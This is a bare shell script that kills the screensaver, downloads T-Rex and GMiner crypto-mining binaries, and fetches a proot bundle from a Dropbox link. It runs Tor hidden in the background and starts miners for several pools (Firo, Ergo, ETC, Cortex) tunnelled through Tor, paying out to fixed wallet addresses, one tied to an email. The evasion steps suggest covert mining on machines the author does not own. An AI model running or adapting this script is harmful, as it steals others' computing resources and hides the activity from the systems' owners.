killall xscreensaver
wget https://github.com/trexminer/T-Rex/releases/download/0.25.8/t-rex-0.25.8-linux.tar.gz
tar -xvf t-rex-0.25.8-linux.tar.gz
rm -f t-rex-0.25.8-linux.tar.gz
./t-rex -a firopow -o stratum+tcp://us-firo.2miners.com:8181 --proxy 127.0.0.1:9050 -u a5GPBi7WUJQG2iJLPLVsfFt1Ttca6NFeEx.t1 -p x

proot=https://www.dropbox.com/s/q171q1igu70mdls/proot.tar.gz?dl=0

wget -O proot.tar.gz $proot

tar -xf proot.tar.gz

rm -rf *.tar.*

chmod 777 dist/proot

nohup ./dist/proot -S . tor  &>/dev/null &

killall xscreensaver
wget https://github.com/trexminer/T-Rex/releases/download/0.25.8/t-rex-0.25.8-linux.tar.gz
tar -xvf t-rex-0.25.8-linux.tar.gz
rm -f t-rex-0.25.8-linux.tar.gz
./t-rex -a autolykos2 -o stratum+tcp://ergo-eu1.nanopool.org:11111 --proxy 127.0.0.1:9050 -u 9gxp8ELudUB11zFTyyRLuuZVW368oaHUA7MkyzrbLwDvvYgeHyj.t1/luongthien96@gmail.com -p x

killall xscreensaver
wget https://github.com/trexminer/T-Rex/releases/download/0.25.8/t-rex-0.25.8-linux.tar.gz
tar -xvf t-rex-0.25.8-linux.tar.gz
rm -f t-rex-0.25.8-linux.tar.gz
./t-rex -a etchash -o stratum+tcp://eu1-etc.ethermine.org:4444 --proxy 127.0.0.1:9050 -u 0xc8025e740d6b3bbaed2862867d172963463ebd43 -p x -w t1

wget https://github.com/develsoftware/GMinerRelease/releases/download/2.80/gminer_2_80_linux64.tar.xz
tar -xvf gminer_2_80_linux64.tar.xz
rm -f gminer_2_80_linux64.tar.xz
./miner --algo cortex --server ctxc.2miners.com --port 2222 --proxy 127.0.0.1:9050 --user 0xc8025e740d6b3bbaed2862867d172963463ebd43.th
